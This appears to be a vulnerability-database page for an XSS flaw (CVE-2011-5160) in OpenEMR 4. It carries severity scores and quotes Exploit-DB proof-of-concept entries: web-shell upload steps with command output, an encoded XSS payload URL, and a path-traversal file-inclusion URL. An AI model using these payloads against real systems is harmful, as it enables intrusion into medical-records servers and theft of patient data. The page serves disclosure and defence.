CVE-2011-5160
published 2012-09-09CVE-2011-5160: Cross-site scripting (XSS) vulnerability in setup.php in OpenEMR 4 allows remote attackers to inject arbitrary web script or HTML via the site parameter.
PriorityP418medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.33%
67.6th percentile
Cross-site scripting (XSS) vulnerability in setup.php in OpenEMR 4 allows remote attackers to inject arbitrary web script or HTML via the site parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| open-emr | openemr | — | — |
| open-emr | openemr | — | — |
| open-emr | openemr | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
OpenEMR 4 - Multiple Vulnerabilities
exploitdb·2011-12-25
CVE-2012-2115 OpenEMR 4 - Multiple Vulnerabilities
OpenEMR 4 - Multiple Vulnerabilities
---
OpenEMR 4 (Level @ Smash The Stack)
Summary: Patient Photograph Arbitrary File Upload
Initial Comment:
1. Login with valid User/Pass
2. Patient/Client -> Search/New Patient (search for anything)
3. Click Documents -> Patient Photograph
4. Upload Shell
URL: http://www.example.com/openemr/sites/SITENAME/documents/PATIENTID/shell.php.jpg?cmd=id
EX: http://www.example.com/oe/sites/default/documents/1/shell.php.jpg?cmd=id
Output: uid=48(apache) gid=48(apache) groups=48(apache)
first installed SITENAME = default
first installed PATIENTID = 1
OpenEMR 4 (Level @ Smash The Stack)
XSS
http://www.target.com/oe/setup.php?site=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharC
Exploit-DB
OpenEMR 4.0.0 - Multiple Vulnerabilities
exploitdb·2011-04-05
CVE-2011-5160 OpenEMR 4.0.0 - Multiple Vulnerabilities
OpenEMR 4.0.0 - Multiple Vulnerabilities
---
Software................OpenEMR 4.0.0
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.oemr.org/
Discovery Date..........4/2/2011
Tested On...............Windows Vista + XAMPP
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch
--Description--
A local file inclusion vulnerability in OpenEMR 4.0.0 can be exploited
to include arbitrary files.
--PoC--
http://localhost/openemr-4.0.0/index.php?site=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
Software................OpenEMR 4.0.0
Vulnerability...........Arbitrary Database Creation/Database Enumeration
Threat Level............Low (1/5
No writeups or analysis indexed.
2012-09-09
Published